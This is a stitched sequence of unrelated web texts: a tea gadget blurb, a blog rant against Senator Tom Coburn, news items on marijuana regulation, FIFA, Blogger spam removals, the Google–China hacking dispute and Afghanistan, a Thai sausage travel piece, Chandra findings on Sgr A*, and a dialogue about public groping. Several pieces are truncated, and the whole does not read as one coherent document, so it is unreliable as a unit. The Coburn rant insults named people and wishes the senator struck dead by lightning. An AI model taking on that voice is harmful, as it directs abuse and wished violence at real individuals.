You can do this .
The TeaSub submerges tea leaves to the bottom of your cup , creating the perfect infusion of your favorite brew .
I have feeling this would turn our little Ella Joy into a tea drinker .
UPDATE : You can pre-order it here .
( via @kylestanding )
It 's time to stop pussyfooting around the reality that the Evil Doctor is either hopelessly insane or a sociopathic liar , and either way needs to be straitjacketed and institutionalized immediately .
-- Dana Milbank , in his Washington Post " Washington Sketch "
The Oklahoma Republican 's procedural maneuvering -- including demanding the bill be read aloud -- had his Democratic colleagues living in fear of what he might pull out of his bag of tricks next .
And , despite his hard work to kill the bill , Coburn 's upfront attitude about his opposition kept him from attracting too much ire from his Democratic colleagues .
The Oklahoman , who led the effort last week to stall proceedings by forcing an hours - long reading of legislative language , had already lobbed a grenade onto the floor when he said that , because of the legislation , Medicare recipients are " going to die sooner . "
On Saturday , Coburn likened the current situation to the period preceding the Civil War .
" The crisis of confidence in this country is now at an apex that has not seen in over 150 years , and that lack of confidence undermines the ability of legitimate governance , " he said .
" There 's a lot of people out there today who . . . will say , ' I give up on my government , ' and rightly so . "
Earlier Sunday , Coburn , a medical doctor by training , held another news conference and accused Democrats of " corruption " in drafting the bill .
He then went out onto the floor two hours later to discuss his prayer that one of the Democrats would n't make it to the chamber .
A few days earlier , Republican Sens. Jim DeMint ( S.C. ) and Sam Brownback ( Kansas ) joined a public prayer for the bill 's defeat -- but Coburn , as usual , went further .
Durbin , learning of Coburn 's prayer , went to the floor 45 minutes later to challenge him to a rhetorical duel .
Coburn declined to return .
" I do n't think we should be wishing misfortune on either side of the aisle , " Durbin said of his absent colleague .
Coburn was wearing blue jeans , an argyle sweater and a tweed jacket with elbow patches when he walked back into the chamber a few minutes before 1 a.m .
He watched without expression when Byrd was wheeled in , dabbing his eyes and nose with tissues , his complexion pale .
When his name was called , Byrd shot his right index finger into the air as he shouted " aye , " then pumped his left fist in defiance .
Democrats were n't in the best position to take the high road Sunday evening .
One of their own members , Sen. Sheldon Whitehouse ( R.I. ) had just delivered an overwrought jeremiad comparing the Republicans to Nazis on Kristallnacht , lynch mobs of the South , and bloodthirsty crowds of the French Revolution .
" Too many colleagues are embarked on a desperate , no - holds - barred mission of propaganda , obstruction and fear , " he said .
" History cautions us of the excesses to which these malignant , vindictive passions can ultimately lead .
Tumbrils have rolled through taunting crowds .
Broken glass has sparkled in darkened streets .
Strange fruit has hung from southern trees . "
Assuming the role of Old Testament prophet , Whitehouse promised a " day of judgment " and a " day of reckoning " for Republicans .
we can't ever point it out
Republican Sen . Tom Coburn did not wish " misfortune " on anyone when he asked people to pray that lawmakers miss a key vote on health care reform , a spokesman said Monday , rejecting suggestions from Democrats that the Oklahoma doctor was wishing ill on his colleagues .
Rather , Coburn was hoping -- praying , even -- that sleep - deprived Democrats would hit the snooze button one too many times and miss the vote scheduled for 1 a.m. ET Monday morning .
" If senators are napping before the vote he would not be disappointed if alarm clocks do n't go off , " spokesman John Hart said in an e-mail .
#
As our Dana goes on to explain , everybody involved in the countdown to the vote on the Senate 's much - compromised health care bill understood that the evil Dr. Coburn " was referring to the 92 - year - old , wheelchair - bound Sen . Robert Byrd ( D - W.V. ) who has been in and out of hospitals and lay at home ailing , " and would be hard put " to get out of bed in the wee hours with deep snow on the ground and ice on the roads " to be the 60th vote the Dems needed .
Let me start by stating , simply and unemotionally , that Sen. Dr. Tom Coburn is an evil , worse - than - worthless pile of shit , and he's in big trouble if this vicious , insane God he and his fellow right - wing crazies keep screeching about and praying to actually exists , because Dr. Shit - for - Brains should be standing in the path of a lightning bolt that will reduce his putrid carcass to a pile of ashes that will presumably have to be disposed of as toxic waste .
By the way , the Evil Doctor is on the WaPo's Chris Cillizza 's list of " The political world 's winners and losers in health care reform " today -- as a ( along with such proud luminaries as John McCain and Ben Nelson ) :
Our Dana refers back to that performance as he expands : Whether the Evil Doctor is deliberately spreading lies like those above with conscious intent to foment violence or he simply does n't have a sane cell in his brain , his crusade of falsehoods is dangerous to decency and to the country , and he needs to be put safely under lock and key in the appropriate facility -- for his own safety as well as society 's .
Meanwhile , I do n't want to leave our Dana looking good .
In fact , " reporting " like his has to be assigned a share of the blame for the epidemic of psychotic factlessness that has engulfed our public discourse .
Because our Dana is stuck in the Village idiot 's tit - for - tat , they 're - all - naughty mantra of truthlessness .
The Evil Doctor 's behavior , you see , is n't that much worse than the following :
As I 've pointed out , no matter how Nazi - like the behavior of the Rampaging Right becomes , .
Not even while those same lying sociopaths make headway with their crusade , as astonishing as it is delusional , to " prove " that Hitler was a " leftist , " just like the " socialist " Obama .
This they can do because they believe that their crackpot God allows them to lie at will , to live in total , unmitigated dissociation from reality , denying every fact that contradicts their delusions .
Really now , would anyone have been more shocked and outraged than the Führer himself at even the lightest insinuation that he was anything but a committed - to - the - death rightist ?
It 's what he built his universe around , and it was his flaunting of the terrifying bogeyman of Bolshevism that enabled him to take power in Germany .
Anyone with any knowledge of history and functioning sensory apparatus also knows that in terms of their political program , their authoritarian mindset , and their bullying , violent political strategy and tactics , the modern American Far Right is not only the rightful but the proud heir of Hitlerism .
I guess that 's why they 're entitled to lie about it with every breath they draw .
That 's what Hitlerites do .
But for the infotainment news media to let them get away with it , to ignore the poison of ignorance and violent authoritarianism that is at the heart of everything they do politically , is journalistically criminal malfeasance .
For our Dana , though , it 's just another day at the office .
Stop the presses !
Fox Noise is " reporting " today : " Republican Sen . Tom Coburn did not wish ' misfortune ' on anyone when he asked people to pray that lawmakers miss a key vote on health care reform , a spokesman said Monday , rejecting suggestions from Democrats that the Oklahoma doctor was wishing ill on his colleagues .
" Which means that the Evil Doctor , his brain - dead toady , and Fox Noise are all psychopathic liars , and it 's time no one said a word to any of them , ever , for any reason , except : " Liar , liar , pants on fire .
"
If you 're curious about the details , here 's the lie offered by the shithead 's toady ( I assume that 's what this lying scumbag fills in anytime a form asks his occupation : " shithead 's toady " ) :
The one small step we could take now would be for it to become automatic :
Anytime anyone comes within sight of the Evil Doctor , his leashed shithead John Hart , or anyone from the liars ' club that is Fox Noise , just shout out : " Liar , liar , pants on fire ! "
Labels : Dana Milbank , Dick Durbin , Tom Coburn
The great thing about making a Van Gogh cake is you do n't have to be particularly skilled in the art of cake - decorating .
Kidding , that shit looks impossible .
Impossibly delicious .
I call a star piece !
Mmmm -- there 's no ear in this , right ?
Fan of Van Gogh ? [ forgetfoo ]
Thanks to Christian , who once found a Band - Aid in an eclair .
​ Marijuana advocates who rallied across the street from the state Capitol Thursday had harsh words for lawmakers considering regulations for Colorado ’s burgeoning medical marijuana industry .
“ Keep your grubby hands off of medical marijuana ! ” shouted activist Robert Chase toward the Capitol building .
The Denver Post .
About 200 marijuana backers attended the rally , timed to begin once Gov. Bill Ritter finished his State of the State speech , reports John Ingold of
Many of the speakers criticized legislative proposals to strictly regulate , or even effectively outlaw , the state ’s growing number of medical marijuana dispensaries .
Several of those speaking at the rally urged marijuana advocates to contact elected officials to lobby for the cause , often even as they cast the relationship between advocates and lawmakers as an adversarial one .
Hollywood star Charlize Theron has endeared herself to the entire Irish nation after selecting Ireland in the draw for the World Cup .
Shocked FIFA observers nearly fell over themselves when Theron plucked an " Ireland " ball out of the bowl in the dress rehearsal for Friday 's draw .
" Ireland , " she announced as FIFA general secretary Jerome Valcke went pale in the face .
Theron , who is a big supporter of the Irish team , is no stranger to making her opinions heard .
She is refusing to marry long - time Irish boyfriend Stuart Townsend until gay marriage is legal .
Ireland of course were knocked out by France after a much disputed handball by Thierry Henry .
Now FIFA officials are concerned that she might repeat the stunt on Friday when she co-hosts the draw with Valcke .
Valcke confirmed the stunt drawing at press conference after the rehearsal .
" Yes , she did , but it was only a joke , " he said .
Google has measures in place to ensure that legitimate blogs can't get mistakenly taken offline as spam , but they 're apparently not enough to prevent certain Blogger sites from being caught in the crossfire .
The recent plight of one blogger who had his blog unceremoniously removed after being reported for spam has brought this issue to light , though Google promises that further measures are about to be in place that will help mitigate it .
Blogger user John Hempton wrote an essay on January 2 about Astarra Strategic Fund , a fund management group that Hempton believes is fraudulent .
In the post , he explained how Astarra fits into the Australian privatized social security system , noting that he sent a letter to authorities to voice his concerns that eventually got him into the newspapers .
One day later , Hempton 's entire blog was no longer available on Blogger , with a note on his end from Google saying that the " spam prevention robots " had detected his blog as spam .
The story was brought to light by a Reuters blog post , which noted that it was likely that Hempton 's blog was flagged as spam by readers ( and , if you like to fan the conspiracy theory flames , probably by astroturfers for Astarra ) .
Google responded by saying that there are a " number of protections " in place to prevent such a situation , but they apparently failed .
" Generally speaking , there were a number of indicators for John ’s blog that should have very easily avoided any false positive spam classification — and I ’m trying to find out how / why those got bypassed , " Google spokesperson Rick Klau wrote .
This is n't the first time such a thing has happened for apparently the same reasons , however ; it certainly seems as if it 's too easy to take blogs down for spam with no easy recourse for legit Blogger users .
Under the current system , those who seek reinstatement must submit a form request through Google and then ... wait .
In a way , the situation reminds us of those who are victims of bogus YouTube takedowns .
It 's too easy for nearly anyone to send a takedown over a video and have it removed before any human gets to evaluate the situation properly — a scenario that several prominent copyright activists have found themselves in the middle of .
Google noted in its response , however , that it 's considering new measures for real bloggers who get accidentally caught in the spam net , such as a reCAPTCHA that Google plans to incorporate into Blogger in the first quarter of this year .
This will certainly help , but in the meantime , there 's not much else affected bloggers can do besides playing the waiting game .
Chiang Khan is in Isaan , in Thailand 's rural northeast .
Because the town is far north , where the steep Lanna mountains meet the parched Isaan flats , the topography here is more varied than in some other parts of Isaan .
So is the cuisine , which is influenced by Laos and Vietnam as well as Northern Thailand .
It 's not unusual to eat a meal of Vietnam - style spring rolls cradled in herbs with some Isaan grilled pork jowl and a pungent , Lao papaya salad .
And then there 's the sausage .
While most outsiders probably do n't associate
Thai cooking with charcuterie , the Thais make great sausage .
There are many styles , but two iconic ones : sai krok Isaan , where natural casings are stuffed with a mixture of pork , glutinous rice and garlic and left to ferment , and sai oo - ah , a sausage made in the north that is nearly equal parts pork and aromatics .
Git and Ton , due to their unique location in Loei Province , make both .
As I chatted with the couple -- both in their mid-50s -- Ton washed a mix of pork shoulder and back fat under running water as her husband separated the membrane from a pork intestine for casing , using the back of a metal soup spoon .
After washing the casings , he covered them in rock salt and left them to cure in the sun .
" You 'll never want to eat sausage again , " my innkeeper had told me when I set out on my quest that morning , but she was wrong .
We worked in a sausage - making idyll -- the porky wastewater ran into a pond full of purple water lilies and catfish , and the only other sounds were cows wandering through brittle grass and rose apples falling on the thatched rooftop .
Everything was spotlessly clean and there was a cool breeze .
People in the rest of the world can only wish their sausages came from places like this .
Each day , Git and Ton assemble 35 kilograms of sausage to sell at the evening market and to a few restaurants .
First the fermented sausage ( sai krok ) is made by grinding meat and fat ( a about a 50/50 ratio ) and garlic and glutinous rice together .
Then , this mixture ( about 7 parts meat to 2 parts rice to 1 part garlic ) is worked by hand with a generous amount of black pepper , palm sugar , salt , soy sauce , and fish sauce , then cased .
Ton swiftly ties it in links with string , before hanging it up to ferment in the dry winter heat .
" The garlic makes it sour , and along with the salt it preserves the pork , " she explains , draping the neatly tied links over a weathered bamboo pole .
" The longer the better , but we never sell it more than 2 days old just to be safe .
We usually eat it at three . "
The sai oo -ah , which is significantly more expensive , is a more complicated affair .
First , about 5 pounds of lemongrass is stripped of its outer layers and shredded .
An equal amount of water - soaked shallots is ground , and large bunches of dill and spring onions are chopped .
This mixture of shallot , dill , chives , slivers of kaffir lime leaf and soaked dry red chiles and lemongrass is added to ground pork and run through the grinder three more times .
The fragrance of onion and herbs fills the air .
" You really need to work the herbs into the meat ! " says husband Git , as he massages fermented shrimp paste and spices into a tub of pork red with chili and green with herbs that smell delicious , even raw .
Astronomers have long known that the supermassive black hole at the center of the Milky Way Galaxy , known as Sagittarius A* ( or Sgr A* for short ) , is a particularly poor eater .
The fuel for this black hole comes from powerful winds blown off dozens of massive young stars that are concentrated nearby .
These stars are located a relatively large distance away from Sgr A* , where the gravity of the black hole is weak , and so their high - velocity winds are difficult for the black hole to capture and swallow .
Scientists have previously calculated that Sgr A * should consume only about 1 % of the fuel carried in the winds .
However , it now appears that Sgr A* consumes even less than expected - ingesting only about one percent of that one percent .
Why does it consume so little ?
The answer may be found in a new theoretical model developed using data from a very deep exposure made by NASA 's Chandra X-ray Observatory .
This model considers the flow of energy between two regions around the black hole : an inner region that is close to the so - called event horizon ( the boundary beyond which even light cannot escape ) , and an outer region that includes the black hole 's fuel source - the young stars - extending up to a million times farther out .
Collisions between particles in the hot inner region transfer energy to particles in the cooler outer region via a process called conduction .
This , in turn , provides additional outward pressure that makes nearly all of the gas in the outer region flow away from the black hole .
The model appears to explain well the extended shape of hot gas detected around Sgr A * in X - rays as well as features seen in other wavelengths .
This Chandra image of Sgr A * and the surrounding region is based on data from a series of observations lasting a total of about one million seconds , or almost two weeks .
Such a deep observation has given scientists an unprecedented view of the supernova remnant near Sgr A* - known as Sgr A East - and the lobes of hot gas extending for a dozen light years on either side of the black hole .
These lobes provide evidence for powerful eruptions occurring several times over the last ten thousand years .
The image also contains several mysterious X - ray filaments , some of which may be huge magnetic structures interacting with streams of energetic electrons produced by rapidly spinning neutron stars .
Such features are known as pulsar wind nebulas .
The new model of Sgr A* was presented at the 215th meeting of the American Astronomical Society in January 2010 by Roman Shcherbakov and Robert Penna of Harvard University and Frederick K. Baganoff of the Massachusetts Institute of Technology .
I believe the Google - China faceoff a momentous occasion .
A major fallout between 2 of the very most powerful organizations on Earth .
So I created this experimental summary to try to wrap my head around it .
The idea is to aggregate all the developments of a major news story , linking even more aggressively than Wikipedia and straight to first sources as much as possible .
The favicon bullets are links to that paragraph ’s source .
All emphases mine .
revealed it had been victim of : " a highly sophisticated and targeted attack on our corporate infrastructure " McAfee : " We have never ever , outside of the defense industry , seen commercial industrial companies come under that level of sophisticated attack . "
They stop " short of saying that the planet nearly stopped spinning . "
McAfee : " we discovered that one of the malware samples involved in this broad attack exploits a new , not publicly known vulnerability in Microsoft Internet Explorer . "
Microsoft : " we have determined that Internet Explorer was one of the vectors used .. against Google and possibly other corporate networks . "
IE 6 , 7 & 8 vulnerable , though only attacks on IE 6 have been confirmed .
" We recommend users of IE6 on Windows XP upgrade to a new version of Internet Explorer and / or enable DEP . "
" Researchers .. create exploits for IE7 , IE8 ..
Microsoft 's mitigations ' weak , ' argues expert " German , French and Australian govt agencies have advised their citizens to switch to IE alternatives .
The British govt will not issue such warning .
300,000 extra downloads of Firefox from IE users from Germany within 4 days of the German govt 's announcement .
Secretary of State Hillary Clinton : " We look to the Chinese government for an explanation .
The ability to operate with confidence in cyberspace is critical in a modern society and economy . "
" originating from China " the Chinese govt ?
Eric Schmidt : " We do not have clear evidence as to who was doing the monitoring , but you can draw your own conclusions . " a report by VeriSign , a major web security company : " The source IPs and drop server of the attack correspond to a single foreign entity consisting either of agents of the Chinese state or proxies thereof " A source close to the company said Wednesday that after Google 's network came under a flurry of cyberattacks in mid-December , company engineers did in fact trace it to a branch of the Chinese government , or agents acting on its behalf .
Chinese Foreign Ministry : " Chinese law prohibits any form of hacking attack . "
Asked if Chinese law also bars the government itself from hacking activity , the question was deferred to the " competent department . "
" Other countries also engage in cyber espionage , especially Israel and of course the United States Government itself with the largest group of hackers in the world employed by the National Security Agency . "
" that resulted in the theft of intellectual property from Google . " particularly , in the partial infiltration of GMail accounts of Chinese dissidents like Tenzin Seldon , a Stanford student and Tibetan activist : " The fact that the Chinese government is intimidated by a 20 - year - old is kind of sad .
" at least twenty other large companies from a wide range of businesses .. have been similarly targeted . "
Yahoo :
" We condemn any attempts to infiltrate company networks to obtain user information ..
We stand aligned with Google that these kinds of attacks are deeply disturbing ... "
( " Yahoo is one of the companies that was targeted in the attacks , according to several people with knowledge of the situation .
The company has declined to confirm that it was a victim . " )
Alibaba : " Yahoo 's statement that it is ' aligned ' with the position Google took last week was reckless given the lack of facts in evidence ..
Alibaba does n't share this view . "
[ Yahoo owns 40 percent in the major Chinese internet company . ]
Adobe : " a sophisticated , coordinated attack against corporate network systems managed by Adobe and other companies . "
Juniper Networks 2nd - biggest maker of computer networking gear ) "
At least 34 companies — including ..
Symantec , ... Northrop Grumman [ US military contractor ] and Dow Chemical — were attacked , according to congressional and industry sources . "
India 's govt too : " China tried to hack our computers , says India 's security chief M.K. Narayanan "
" We have taken the unusual step of sharing information about [ it ] .. because this information goes to the heart of a much bigger global debate about freedom of speech .
" Cellular companies in Beijing and Shanghai have been told to suspend text services to cellphone users who are found to have sent messages with ' illegal or unhealthy content ' " Obama ( remarks in China tour ) : " I 'm a big supporter of non-censorship ... the more freely information flows , the stronger the society becomes , because then citizens of countries around the world can hold their own governments accountable ...
They can begin to think for themselves . "
" Short of the role of the East India Company .. , it 's hard to come up with other examples of a private corporation ( albeit " publicly held " ) yanking the reins any harder on the bridle of history . " " a watershed moment in the history of industrial globalization ... everyone is struggling for context . "
" Google contacted Yahoo about the attacks before it publicized them .
Google executives were dismayed that other companies were unwilling to publicly acknowledge the attacks , and they were particularly frustrated by Yahoo 's silence , one person said . "
Yahoo pulled out of China " after it [ controversially ] provided information to Chinese authorities that led to the arrest of journalists . "
" .. this great nation [ China ] is at the heart of much economic progress and development in the world today . " reaction from the Chinese government : State Council Information
Office 's director : " Our country is at a crucial stage of reform and development , and this is a period of marked social conflicts ...
Properly guiding internet opinion is a major measure for protecting internet information security . "
Internet businesses must adhere to " propaganda discipline .
" Foreign Ministry spokeswoman : " The Chinese government administers the Internet according to law and we have explicit stipulations over what content can be spread on the Internet . "
" The question is , what law says that Google cannot index the web site of the BBC news ?
Anyone know ? " China Daily ( state - run English - language newspaper ) : " ' Do No Evil ' lays bare Web giant 's hypocrisy ... an inglorious retreat . .. yet another example of American hubris and imperialistic hypocrisy . " reaction from Chinese citizens : Flowers and candles were laid at Google 's Beijing HQ .
The flowers were promptly removed .
A security guard : without " permits at the relevant department ... they were conducting an ' illegal flower tribute . ' '"
@cxzj : " This is not Google withdrawing from China , but China withdrawing from the rest of the world . "
" Google : Bye , let 's meet on the other side of the wall . " @benziz : " I never imagined there would be a day without Google.com , without Reader , without Gmail " [ widely circulated tweet : ]
" The sin of facebook is that it helps people know who they wanna know .
The sin of Twitter is that it allows people to say what they wanna say .
The sin of Google is that it lets people find what they wanna find , and Youtube let us see what we wanna see .
So , they are all kicked away . "
" [ mock ] make up how the state - run media CCTV might comment on the incident : Recently because Google encountered issues such as obscene search returns , infringement on copyrights , it is boycotted by the Chinese netizens .
Also due to the decreasing revenue , it is considering to quit the Chinese market .
This is another case of boycotting a perverted foreign website by Chinese people .
" " Google Bye . "
" We launched Google.cn in January 2006 in the belief that the benefits of increased access to information for people in China and a more open Internet outweighed our discomfort in agreeing to censor some results . "
Sergey Brin : " We felt that perhaps we could compromise our principles but provide ultimately more information for the Chinese and be a more effective service and perhaps make more of a difference ..
Perhaps now the principled approach makes more sense .
" ( June 6 , 2006 ) Brin fled Soviet Russia as a children .
Google , together with Yahoo , Microsoft and Cisco were convened to a US house of representatives hearing to discuss the morality of collaboration with China 's " regime of repressions " .
They were lashed at by politicians : " What Congress is looking for is real spine and willingness to stand up to the outrageous demands of a totalitarian regime . "
( February 15 , 2006 ) Here 's Google 's testimony .
On discussions after the attacks : " Mr. Schmidt made the argument he long has .. namely that it is moral to do business in China in an effort to try to open up the regime .
Mr. Brin strenuously argued the other side , namely that the company had done enough trying and that it could no longer justify censoring its search results . "
" We have decided we are no longer willing to continue censoring our results on Google.cn
" we will be discussing with the Chinese government the basis on which we could operate an unfiltered search engine within the law , if at all . "
" Google derives an estimated $ 300 million to $ 400 million in annual revenue from China 's Internet users . " that 's only " about 1.5 percent of total sales . "
Google 's main competitor in China is Baidu , who had 58.6 % of the search market versus Google 's 35.6 % on the last quarter of 2009 .
From the day of the announcement , GOOG stocks have remained practically undisturbed , while BIDU 's have seen considerable gains , , ending Jan. 19 at - 0.01 % and +14 % of their Jan. 12 prices , respectively .
Baidu's Chief Technology Officer resigned on Jan. 19 .
Allegedly for difficulties on the rollout of a new advertising tool .
Baidu's Chief Operating Officer resigned on Jan. 8 , citing " personal reasons " Baidu sues its US domain registrar firm ( Register.com ) over " gross negligence " on the hacker attack that disrupted its service on Jan. 12 Today , Jan. 21 , Google will present its 4th Quarter Earnings at a conference call .
Tough questions on the China decision expected .
revealed it had been victim of :
Early days , so please be gentle !
I need your help , this is too much for one mind .
Please comment corrections , suggestions and updates !
Jan 24 , 2009 : I ’m not officially maintaining this story any more .
It is indeed too much for one mind .
I ’ve learned many things by making this experiment that I had been dreaming about for many years ( I called it “ linklines ” in my mind ) .
Soon you ’ll see projects inspired by these lessons !
( Reuters ) - President Barack Obama is preparing to announce on Tuesday he will send about 30,000 more U.S. troops to Afghanistan in a long - awaited war strategy shift he hopes will defeat the Taliban and allow for an eventual exit .
After three months of deliberations , Obama will outline his plans in an address at 8 p.m. EST on Tuesday ( 0100 GMT Wednesday ) from the U.S. Military Academy at West Point , New York .
The following are some key facts and figures about Afghanistan :
PROFILE
* Afghanistan is a landlocked country in Central Asia which shares borders with Iran , Pakistan , China , Tajikistan , Uzbekistan and Turkmenistan .
* Hamid Karzai has led the country since 2001 , when U.S. - backed Afghan forces ended the five - year rule of the austere Islamist Taliban movement .
* Karzai was first appointed leader of Afghanistan ’s interim government at the Bonn conference of December 2001 and has been re-elected twice since .
* Afghanistan ’s population is almost 30 million .
Life expectancy for both men and women is about 45 years .
* Some 42 percent of Afghans are Pashtun and 27 percent are Tajik. Hazaras and Uzbeks each account for 9 percent of Afghans .
* There are two national languages , Pashto and Dari .
Pashto is the language of the Pashtuns and is spoken exclusively in many parts of the south and east .
Dari , a Persian language , is spoken mainly in the north and center of Afghanistan .
* Only 28 percent of Afghans are literate .
SECURITY AND VIOLENCE
* Violence has escalated as tens of thousands of additional foreign troops , mainly Americans , have been deployed in response to an escalating Taliban insurgency which has claimed record numbers of military and civilian lives so far in 2009 .
* About 1,530 foreign troops have been killed in Afghanistan since the war started in November 2001 .
* The United States has lost 928 troops , Britain 236 and other NATO contributors 368 , according to the iCasualties website ( www.icasualties.org).
* Improvised explosive devices ( IEDs ) are by far the biggest killer of foreign troops .
So far in 2009 , at least 255 troops have been killed by home - made , insurgent - laid bombs .
* August 2009 was the deadliest month of the war for foreign troops -- at least 77 were killed -- driven by two major operations to secure parts of Helmand province and then voting in the presidential election on August 20 .
There were hundreds of Taliban attacks across the country in the run-up to the vote .
October 2009 was the worst month of the war for U.S. troops , with at least 53 killed .
* About 800 civilians were killed between January and May this year , a 24 percent increase from the same period a year earlier , according to U.N. figures released in June .
* More than half of those deaths were caused by insurgents and just over a third by international and Afghan forces , the United Nations said .
INTERNATIONAL FORCES
* There are about 110,000 foreign troops from 42 countries working under the NATO - led International Security Assistance Force ( ISAF ) , which was established in December 2001 .
* The United States has by far the most troops in Afghanistan with 68,000 in total , most arriving this year .
About half work under the ISAF mandate , the rest under the Pentagon ’s Operation Enduring Freedom , which also has a mandate to support ISAF .
* Britain , with 9,000 troops , is the second largest ISAF contributor and will deploy another 500 troops this month , Prime Minister Gordon Brown has said .
Germany is next with 4,365 and France with 3,095 , according to the most recent NATO figures from October .
* U.S. President Barack Obama is expected to announce on Tuesday he will send about 30,000 more U.S. troops to Afghanistan , on the advice of the commander of foreign forces in Afghanistan , U.S. Army General Stanley McChrystal .
ECONOMY
* According to the United Nations Human Development rankings for 2009 , Afghanistan is ranked 181st out of 182 countries .
* Devastated by 30 years of conflict , Afghanistan ’s economy is dependent on foreign aid .
Some 90 percent of the Afghan government budget comes from international donors .
* In 2007 , about $ 288 million of direct foreign investment flowed into Afghanistan , according to the World Bank .
* Some analysts say Afghanistan ’s economic growth has also been stunted by high levels of corruption which prevents donor aid from reaching ordinary Afghans .
* Public sector corruption in Afghanistan is seen as more rampant than any other country except Somalia , according to Transparency International .
DRUGS
* Afghanistan produces 92 percent of the world ’s opium , a thick paste from poppy used to make heroin , according to the latest U.N. Office on Drugs and Crime report .
* Helmand province in southern Afghanistan produces 90 percent of Afghanistan ’s opium poppy crop .
* About two thirds of the opium is turned into heroin before it leaves Afghanistan and goes on to feed some 15 million addicts , mainly in Russia , Iran and Europe .
* Opium cultivation in Afghanistan is directly linked to the Taliban insurgency .
Since 2005 , the Taliban have made up to $ 160 million a year from taxing cultivation and trade of the crop in Afghanistan .
Sources : NATO , U.S. Forces , Reuters reports , U.N. , World Bank , iCasualties.org ; CIA World Fact Book , Transparency International .
[ youtube:v=QjWn-ueeeLw ]
This is what the guy touching your ass thinks you ’re thinking .
Public sexual assault : I ’m still fucking talking about it !
But this time , I ’ve got a little bit of help from the illustrious Sady Doyle of Tiger Beatdown .
Join us for a Very Special Episode of Sexist Beatdown , specially tailored for Guys Who Grab Butt , and what the hell is wrong with them .
When our powers combine , we get to the bottom of your most pressing groping questions .
Such as :
Why does n’t Sady appreciate it when you comment on her jugs ?
If it ’s not featured on an episode of SVU , does it still count as sexual assault ?
And if the girl whose butt you grabbed responds by assaulting you back , is she going to get in trouble , or what ?
SADY : well , HI !
I am so excited to join you on the Train to Gropetown this evening !
AMANDA : Hi !
The Train to Gropetown departs now .
SADY : Perhaps we should note that many ACTUAL gropings take place on trains , which is a bummer ?
Truly , Gropetown is a destination of the spirit , and not one of mere place and time .
AMANDA : Right .
And that on these trains , and subway cars , and buses are dozens of other people who are not gropers or groping victims , but really just witnesses who are standing but feet away from a sexual assault .
One thing I hear all the time is that sexual assault is so difficult to “ prove ” and to “ deal with ” because it happens in private , tucked away behind doors and in intimate relationships .
But really , it happens all the time in front of people ’s faces , too !
And most people still do n’t really give a shit about it .
SADY : Yes .
Oddly , I think people have a problem conceptualizing public gropings as sexual assault — - the same way they do n’t think of street harassment as sexual harassment .
It ’s just supposed to be one of the many things that , as Ann - Margret would say , help you to Enjoy Being A Girl .
Like , there is a “ Special Victims Unit ” concept of sexual assault that most people have , the kind done by scary dudes for dark and wacky purposes — - and then there ’s getting your ass grabbed on the subway , which , CALM DOWN , sweetheart !
AMANDA : I , too , have noticed a big resistance to considering groping on the spectrum of sexual assault .
Of course , I have all sorts of feminist conspiracy theories as to why that ’s the case .
SADY : Ha .
The BEST kind of conspiracy theories !
But I honestly think it ’s the same blanket denial of assault as reality that you find everywhere .
Sexual assault is rare ; therefore , if it ’s common , it ’s not sexual assault .
I do n’t know anyone who would sexually assault someone ; therefore , if I know someone who would do this – or if I MYSELF would do this – it ’s not sexual assault .
I ’ve never been sexually assaulted ; therefore , if it happens to me , it ’s not sexual assault .
It ’s a wonderful loop of logic that keeps anything from ever changing EVER !
AMANDA : Your arguments appear sound , forcing me to discredit you as a man-hating feminist .
But seriously folks .
One of the most interesting things I ’ve discovered in doing this series is that a lot of women respond to being sexually assaulted by freezing and shutting up .
But if you look at your other options — - like , say , screaming — - you find women who report being stared at like she ’s an annoying bitch for screaming for no reason , in public .
SADY : Allow me to submit to you some anecdote as data , in lieu of an explanation for why this might be the case !
AMANDA : great !
SADY : So : picture , if you will , Sady , a burly man-friend , and a not - at - all - burly lady friend walking up the stairs of the subway .
The lady friend occupying the stair level in front of me , the gentleman and I behind .
Lo and behold , I see before me a hand !
And the hand is most definitely reaching out to grab – and subsequently grabbing – my friend ’s ass .
I freeze .
The lady freezes .
The dude who is with us keeps on a - walkin ’ like it ’s no big thing , but , whatever .
After about 2 seconds , I grab the butt - fondling dude ’s arm and shove him into the side of the stairs and yell at him , because , WHAT THE FUCK .
But for a second there , nobody was prepared to deal with what was happening .
And as soon as I took action , the first thing that came to my mind was , “ Am I going to get in trouble for this ? ”
Honestly , I think people are worried about getting in TROUBLE if they respond .
I think that is part of the deal .
AMANDA : I actually have a request out to the D.C. police department addressing this very issue .
I have n’t heard back from them yet .
But my question was basically , “ So , women want to know , if men touch them on the genitals , may they respond by punching the men in the face ? ”
And they ’ve been working on it for , like , a week .
SO , surprise ending to that conundrum to be revealed later !
SADY : Hahaha .
Well !
I imagine it would take some time to think that one over !
Except that is the thing .
When you get grabbed , or someone is masturbating in your general direction on the subway , there ’s no time to rifle through the bylaws .
And I think you just freeze up because , what are you supposed to do ?!
There is no chapter in Miss Manners that tells you how to politely request that someone put his boner away !
And there ’s the possibility of retaliation , too .
Like , I ca n’t tell you HOW many times a dude has gotten up in my face to be a dickhole , just if I ask him not to compliment my astounding jugs while I am WALKING , or whatever .
AMANDA : Bitch !
SADY : I KNOW .
I am a total bitch ; many a person on the streets of New York has confirmed this .
Also , I am not in fact all that , and although they once thought I was attractive , further study has revealed that I am not so fucking hot as was once supposed .
AMANDA : And the scary thing is that real people — - people who are not the scary dude who just yelled at you on the street — - would probably agree with that sentiment .
SADY : Exactly .
It ’s the culture of tolerance around it that is the real psychedelic freakout bad trip of terror .
Like , people seem to believe the phenomenon of groping to be HIGHLY COMICAL .
AMANDA : Or that grabbing a guy ’s arm for touching your butt is such an overreaction !
Silly , emotional women .
SADY : Or , for example , you can be telling a story about a guy who grabbed your boob in a bar , and male onlookers will weigh in to tell you that you have no idea how hard it is for the men , what with their having to initiate sexual encounters !
AMANDA : HAH .
That one I have n’t heard !
“ You do n’t understand — - if I ca n’t just reach out and touch your butt , what am I supposed to do ?
Talk to you ? ”
SADY : I KNOW .
Perhaps they feel that the ladies will appreciate their forthright natures !
And I ’m not entirely sure that this is all coming from guys who grab butt , either .
I think these are non-grabbing guys who are just , like , “ oh my God , if ladies are talking about how OTHER behavior is inappropriate , perhaps someday they might interpret MY PRESUMABLY DIFFERENT BEHAVIOR as inappropriate as well !
And then I will not get laid !
When clearly the priority here is for ladies to make it easier for me to get laid . ”
AMANDA : By any means necessary .
But if you end up not being able to get laid , hey — - there are butts everywhere up for the grabbing .
SADY : Like , I do n’t think we ’re long past the stage when casually smacking a strange girl ’s butt was considered a cute and roguish flirting maneuver , rather than a reason for that girl to methodically snap off your hand like the head on a Barbie doll .
